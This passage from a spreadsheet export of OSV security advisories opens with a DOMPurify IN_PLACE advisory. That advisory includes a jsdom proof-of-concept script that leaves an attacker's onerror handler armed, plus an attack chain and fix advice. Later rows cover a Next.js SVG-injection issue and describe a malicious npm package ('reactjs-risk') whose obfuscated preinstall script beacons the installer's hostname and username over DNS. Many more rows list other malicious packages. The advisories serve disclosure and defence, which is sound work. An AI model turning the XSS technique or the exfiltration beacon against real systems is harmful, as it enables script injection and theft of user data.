`IN_PLACE` sanitization mutates the caller's live document, so any element a hook detaches from that tree must have its subtree neutralized before `sanitize()` returns; otherwise a queued resource-event handler (for example an `&lt;img onerror&gt;` that began loading when the caller built the tree) fires in page scope even though the handler never reached the sanitized output. The guard helper `_handleHookDetachedNode` (which calls `_neutralizeSubtree` in `IN_PLACE`) is invoked only after `beforeSanitizeElements` and after `uponSanitizeElement`. It is never invoked from the afterSanitize return paths, and `_sanitizeAttributes` never calls it at all. The post-walk `IN_PLACE` neutralization pass iterates only `DOMPurify.removed`, and hook-detached nodes are intentionally not recorded there, so that pass cannot reach them either.
```text
src/purify.ts
  _sanitizeElements: _handleHookDetachedNode present at lines 2142 and 2175
    (before/upon), absent after afterSanitizeElements at lines 2208 and 2249.
  _sanitizeAttributes: afterSanitizeAttributes fires at line 2670 with no
    detach re-check; the function never calls _handleHookDetachedNode.
  Post-walk IN_PLACE pass (lines 3081-3090) iterates DOMPurify.removed only,
    which by design (comment at lines 2096-2099) excludes hook-detached nodes.
```
## Impact
An attacker who supplies markup processed by a victim application that runs `DOMPurify.sanitize(node, { IN_PLACE: true })` and registers a node-removing `afterSanitizeElements` or `afterSanitizeAttributes` hook can retain arbitrary `on*` event handlers on descendants of a removed non-root element. Because `IN_PLACE` operates on the caller's live document, a queued resource-event handler on such a descendant fires in the page origin after the synchronous `sanitize()` call returns, giving script execution in the victim's session (DOM XSS). This defeats DOMPurify's `IN_PLACE` contract to neutralize handlers on subtrees removed from the live tree. The capability is script execution in the victim origin; exact confidentiality and integrity effects depend on the hosting application's session.
## Proof of Concept
```text
Dependencies: Node.js and jsdom. The harness builds a live tree, registers a
removal hook, runs IN_PLACE sanitize(), then inspects whether the attacker
onerror handler survives on the detached descendant. jsdom does not perform
real image loads, so the retained handler (rather than an actual fired event)
is the observed hazard; the retained on* attribute on a live detached node
after a synchronous sanitize() return is the neutralization failure.
```
Reproduction steps:
1. Build a live subtree `#root &gt; section#wrap &gt; img[onerror]` where `#root` is the walk root and `section#wrap` is a non-root wrapper.
2. Register an `afterSanitizeElements` (or `afterSanitizeAttributes`) hook that calls `node.remove()` on the wrapper.
3. Call `DOMPurify.sanitize(root, { IN_PLACE: true })`.
4. Observe that the descendant `&lt;img&gt;` retains its `onerror` handler, whereas the same removal performed in a `beforeSanitizeElements`/`uponSanitizeElement` hook strips it.
```javascript
const { JSDOM } = require('jsdom');
const createDOMPurify = require('dompurify');
const { window } = new JSDOM('&lt;!DOCTYPE html&gt;&lt;body&gt;&lt;/body&gt;');
const DOMPurify = createDOMPurify(window);
const root = window.document.createElement('div');
root.id = 'root';
root.innerHTML = '&lt;section id="wrap"&gt;&lt;img src="x" onerror="ATTACKER()"&gt;&lt;/section&gt;';
window.document.body.appendChild(root);
DOMPurify.addHook('afterSanitizeElements', (node) =&gt; {
  if (node.id === 'wrap') node.remove();
});
DOMPurify.sanitize(root, { IN_PLACE: true });
// The detached &lt;img&gt; still carries its onerror handler:
console.log(root.querySelector('#wrap') === null,               // true (removed from live tree)
            !!window.document.querySelector('img[onerror]') ||  // handler survives on the detached node
            root.innerHTML);
```
```text
PASS: beforeSanitizeElements detach neutralizes descendant onerror (control)
PASS: uponSanitizeElement detach neutralizes descendant onerror (control)
PASS: without a removal hook the descendant onerror is stripped normally
PASS: afterSanitizeElements detach LEAVES descendant onerror armed (GAP)
PASS: afterSanitizeAttributes detach LEAVES descendant onerror armed (GAP)
PASS: kept custom element removed in afterSanitizeElements leaves descendant onerror armed (GAP)
```
## Attack Chain
1. **Exposure:** The victim application calls `DOMPurify.sanitize(liveNode, { IN_PLACE: true })` on attacker-influenced markup and has registered a node-removing `afterSanitizeElements` or `afterSanitizeAttributes` hook per an application policy (`src/purify.ts:3026` walk, `2136` element pass, `2522` attribute pass).
2. **Control:** The attacker controls the markup, including a non-root wrapper element and, inside it, a descendant carrying an `on*` resource-event handler such as `&lt;img src=x onerror=...&gt;`.
3. **Path:** The pre-order walk visits the wrapper before its descendants. During the wrapper's element or attribute pass the application hook detaches the wrapper from the live tree.
4. **Guard:** The detach-neutralization guard `_handleHookDetachedNode` runs only after `beforeSanitizeElements` (`2142`) and `uponSanitizeElement` (`2175`); it is absent after `afterSanitizeElements` (`2208`, `2249`) and is never called by `_sanitizeAttributes` (afterSanitizeAttributes at `2670`). The NodeIterator advances past the detached subtree, so the descendants are never revisited, and the post-walk pass iterates only `DOMPurify.removed`, which excludes hook-detached nodes.
5. **Primitive:** The descendant retains its `on*` handler on the caller's live document after `sanitize()` returns.
6. **Result:** The queued resource event fires the attacker handler in the victim page origin, achieving DOM XSS despite `IN_PLACE` sanitization.
## Bypass Evidence
The relevant prior fix is GHSA-55q2-fjhq-7xh7 ("IN_PLACE hook removal leaves a detached subtree executable, causing XSS"), whose change (`#1557`) added `_neutralizeSubtree` at the `beforeSanitizeElements` and `uponSanitizeElement` detach sites. Inspection of that change shows it touches no afterSanitize site: the diff adds the neutralization only at the before/upon locations, later refactored into `_handleHookDetachedNode` at `src/purify.ts:2142` and `2175`. A subsequent hardening change (`#1616`) added a `rootWasRemoved` throw and a neutralization sweep over `DOMPurify.removed`, but that sweep still iterates only `DOMPurify.removed`, which by design excludes hook-detached non-root nodes, so it does not close this gap. The `afterSanitizeElements`-on-kept-custom-element site at `2208` was itself introduced by the fix for GHSA-c2j3-45gr-mqc4 (`#1527`), adding another uncovered hook site.
Disproof attempts, all failed: (a) that a later release closed the afterSanitize gap, refuted by inspecting the published 3.4.13, 3.4.14, and 3.4.15 artifacts; (b) that detached descendants are revisited or re-sanitized, refuted at runtime (the `onerror` is retained only at the afterSanitize sites and stripped at the before/upon sites and with no removal hook); (c) that the post-walk pass catches hook-detached nodes, refuted by the design that excludes them from `DOMPurify.removed`; (d) that the precondition is contrived, refuted by parity with the accepted GHSA-55q2 threat model and the library's own supported pattern of removing a node inside `afterSanitizeElements`. The only edge not directly executed is the browser resource-event dispatch (jsdom performs no real image load); it is established by the proven retention of the live handler after a synchronous return, the library's own comments describing exactly this hazard, and parity with the accepted GHSA-55q2 mechanism.
## Affected Versions
- `Ecosystem: npm`
- `Package: dompurify`
- `Confirmed affected range: &gt;= 3.4.13, &lt;= 3.4.15`
- `Latest release checked: 3.4.15 (npm registry)`
- `Fix status: fixed in 3.4.16`
The before/upon detach neutralization introduced for GHSA-55q2-fjhq-7xh7 first shipped in 3.4.13; the residual afterSanitize gap was verified by reproducing it against the published npm artifacts for 3.4.13, 3.4.14, and 3.4.15. The 3.4.12 artifact predates that neutralization and behaves differently at the before/upon sites, so it is outside this specific incomplete-fix range. No release through 3.4.15 neutralizes detached subtrees at the afterSanitize sites, so no fixed version is established.
## Suggested Fix
Enforce the same `IN_PLACE` detach-neutralization invariant at every hook site that can detach a node, not only the before/upon sites. Concretely, apply a `_handleHookDetachedNode(currentNode, root)` re-check after `afterSanitizeElements` at both `src/purify.ts:2208` and `2249` (returning as removed when the node was detached), and add an equivalent `IN_PLACE` detach check plus `_neutralizeSubtree` after `afterSanitizeAttributes` at `2670`. As an interim mitigation without a code change, applications using `IN_PLACE` can avoid removing nodes inside `afterSanitizeElements`/`afterSanitizeAttributes` hooks and instead perform such removals in `beforeSanitizeElements`/`uponSanitizeElement`, or avoid `IN_PLACE` for attacker-influenced content.
Reported by zx (GitHub: @manus-pi).</t>
        </is>
      </c>
      <c r="T662" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-p98j-92pf-mc4p</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
      <c r="D663" s="5" t="inlineStr"/>
      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M663" s="5" t="inlineStr">
        <is>
          <t>16.3.6</t>
        </is>
      </c>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q663" s="5" t="inlineStr"/>
      <c r="R663" s="5" t="inlineStr"/>
      <c r="S663" s="5" t="inlineStr">
        <is>
          <t>## Impact
The Node.js `ImageResponse` implementation from `next/og` is affected by an upstream vulnerability. This can lead to remote code execution.
Affected applications pass attacker-controlled values into SVG content, attributes, or styles during image generation:
```tsx
import { ImageResponse } from 'next/og'
export async function GET(request: Request) {
  const value = new URL(request.url).searchParams.get('value') ?? ''
  return new ImageResponse(
    &lt;svg width="1200" height="630"&gt;
      &lt;title&gt;{value}&lt;/title&gt;
    &lt;/svg&gt;
  )
}
```
Applications using the Edge `ImageResponse` implementation, or applications that do not pass attacker-controlled values into SVG content, attributes, or styles, are not affected.
## Workaround
If upgrading is not immediately possible, do not pass attacker-controlled values into SVG content, attributes, or styles rendered by the Node.js `ImageResponse` implementation from `next/og`.</t>
        </is>
      </c>
      <c r="T663" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17339</t>
        </is>
      </c>
      <c r="D664" s="5" t="inlineStr"/>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="inlineStr"/>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr">
        <is>
          <t>npm, react</t>
        </is>
      </c>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr">
        <is>
          <t>npm:reactjs-risk</t>
        </is>
      </c>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q664" s="5" t="inlineStr"/>
      <c r="R664" s="5" t="inlineStr"/>
      <c r="S664" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0e58c82916c5199ef9e73a5d70f91d120312151eb5c28090d8bbf6dbf4117543)
The package's preinstall lifecycle script collects host identity metadata from the installer machine — os.hostname(), the output of `whoami`/os.userInfo().username, and os.platform() — hex-encodes the values, and issues a DNS A-record lookup for `&lt;hex&gt;.768hgkqn53abdemu8ikzkel4g.canarytokens.com`, causing the installer's hostname, username, and platform to be transmitted to the canarytoken operator on every `npm install`. The dns module is loaded via string concatenation (`'d'+'n'+'s'`) and the `whoami` command is similarly split, indicating deliberate obfuscation of the module and command names. The package's declared main entry is an empty stub with no library functionality, so the preinstall beacon is the package's only behavior. Installing this package auto-executes an unauthenticated exfiltration of installer identity metadata to a third-party DNS endpoint the installer did not opt into.
## Source: ossf-package-analysis (a32a318956967c92b753750e0b607e48db7eef07d05f25c2b687f3b9612f806e)
The OpenSSF Package Analysis project identified 'reactjs-risk' @ 99.17.1 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
</t>
        </is>
      </c>
      <c r="T664" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17339</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17340</t>
        </is>
      </c>
      <c r="D665" s="5" t="inlineStr"/>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="inlineStr"/>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr">
        <is>
          <t>npm:@astracode/byles-new</t>
        </is>
      </c>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q665" s="5" t="inlineStr"/>
      <c r="R665" s="5" t="inlineStr"/>
      <c r="S66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@astracode/byles-new (npm), version(s): 0.1.37, 0.1.36, 0.1.35, 0.1.3, 0.0.99, 0.1.2, 0.1.1, 0.1.0.</t>
        </is>
      </c>
      <c r="T665" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17340</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17341</t>
        </is>
      </c>
      <c r="D666" s="5" t="inlineStr"/>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="inlineStr"/>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr">
        <is>
          <t>npm:@badzz88/baileys</t>
        </is>
      </c>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q666" s="5" t="inlineStr"/>
      <c r="R666" s="5" t="inlineStr"/>
      <c r="S66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@badzz88/baileys (npm), version(s): 8.5.9, 8.5.7, 8.5.5, 8.5.4, 8.5.3, 8.5.2, 8.5.1.</t>
        </is>
      </c>
      <c r="T666" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17341</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17342</t>
        </is>
      </c>
      <c r="D667" s="5" t="inlineStr"/>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="inlineStr"/>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/belbails</t>
        </is>
      </c>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr"/>
      <c r="S66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@bellaxchuu/belbails (npm), version(s): 1.0.1.</t>
        </is>
      </c>
      <c r="T667" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17342</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17343</t>
        </is>
      </c>
      <c r="D668" s="5" t="inlineStr"/>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="inlineStr"/>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/crystalred</t>
        </is>
      </c>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr"/>
      <c r="S66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@bellaxchuu/crystalred (npm), version(s): 0.1.2.</t>
        </is>
      </c>
      <c r="T668" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17343</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17344</t>
        </is>
      </c>
      <c r="D669" s="5" t="inlineStr"/>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="inlineStr"/>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/familyxtrx</t>
        </is>
      </c>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr"/>
      <c r="S66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@bellaxchuu/familyxtrx (npm), version(s): 0.1.5.</t>
        </is>
      </c>
      <c r="T669" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17344</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17345</t>
        </is>
      </c>
      <c r="D670" s="5" t="inlineStr"/>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="inlineStr"/>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/flowblue</t>
        </is>
      </c>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/flowblue (npm), version(s): 1.5.7.</t>
        </is>
      </c>
      <c r="T670" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17345</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17346</t>
        </is>
      </c>
      <c r="D671" s="5" t="inlineStr"/>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="inlineStr"/>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/privatebails</t>
        </is>
      </c>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/privatebails (npm), version(s): 1.4.1.</t>
        </is>
      </c>
      <c r="T671" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17346</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17347</t>
        </is>
      </c>
      <c r="D672" s="5" t="inlineStr"/>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="inlineStr"/>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/skyblue</t>
        </is>
      </c>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/skyblue (npm), version(s): 2.1.2.</t>
        </is>
      </c>
      <c r="T672" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17347</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17348</t>
        </is>
      </c>
      <c r="D673" s="5" t="inlineStr"/>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="inlineStr"/>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/teambails</t>
        </is>
      </c>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q673" s="5" t="inlineStr"/>
      <c r="R673" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/teambails (npm), version(s): 1.1.9, 1.1.8, 1.1.6, 1.1.4, 1.2.4.</t>
        </is>
      </c>
      <c r="T673" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17348</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17349</t>
        </is>
      </c>
      <c r="D674" s="5" t="inlineStr"/>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="inlineStr"/>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/velvetry</t>
        </is>
      </c>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q674" s="5" t="inlineStr"/>
      <c r="R674" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/velvetry (npm), version(s): 0.1.4, 0.1.3.</t>
        </is>
      </c>
      <c r="T674" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17349</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17350</t>
        </is>
      </c>
      <c r="D675" s="5" t="inlineStr"/>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="inlineStr"/>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/xtrxbails</t>
        </is>
      </c>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q675" s="5" t="inlineStr"/>
      <c r="R675" s="5" t="inlineStr"/>
      <c r="S67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@bellaxchuu/xtrxbails (npm), version(s): 0.0.8.</t>
        </is>
      </c>
      <c r="T675" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17350</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17351</t>
        </is>
      </c>
